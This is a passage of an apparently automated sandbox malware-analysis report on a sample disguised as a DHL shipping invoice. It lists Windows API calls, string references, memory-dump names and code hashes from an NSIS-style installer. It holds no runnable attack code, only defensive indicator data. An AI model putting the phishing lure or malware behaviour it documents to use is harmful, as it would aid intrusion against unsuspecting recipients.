                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(73A421EC,00000000), ref: 73A41657
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A41660
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1148316912-0
                                                                                                                                                                                                                                      • Opcode ID: c9d1557ec351c43904b181f51eab15309e4119736822bedf8f39e51b2716d9fa
                                                                                                                                                                                                                                      • Instruction ID: cb70c850be323bd355c51d07e14cb42d18a63e7a9f7d17ac3d5ac91cd5c91dd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9d1557ec351c43904b181f51eab15309e4119736822bedf8f39e51b2716d9fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0F01C732061387BD6202AAB8C4DD9BBF9CEFCB2F5B210211F62C9219086664C12D7F1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      • Opcode ID: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
                                                                                                                                                                                                                                      • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                                      • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                      • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                                      • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn7D60.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsn7D60.tmp
                                                                                                                                                                                                                                      • API String ID: 2655323295-1298646570
                                                                                                                                                                                                                                      • Opcode ID: 6d38f70405a658c56de4fed2dbabf299bb334def7cecbf627fa8bdc79fdc52eb
                                                                                                                                                                                                                                      • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d38f70405a658c56de4fed2dbabf299bb334def7cecbf627fa8bdc79fdc52eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 2659869361-787714339
                                                                                                                                                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                                      • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                      • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                                      • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                                                        • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                                      • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                      • Opcode ID: 10557ccebddc974baa13a8be622e9b5680c4afd7942ecc434493cd2fadbdf3ae
                                                                                                                                                                                                                                      • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10557ccebddc974baa13a8be622e9b5680c4afd7942ecc434493cd2fadbdf3ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                      • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                                      • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,757C3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
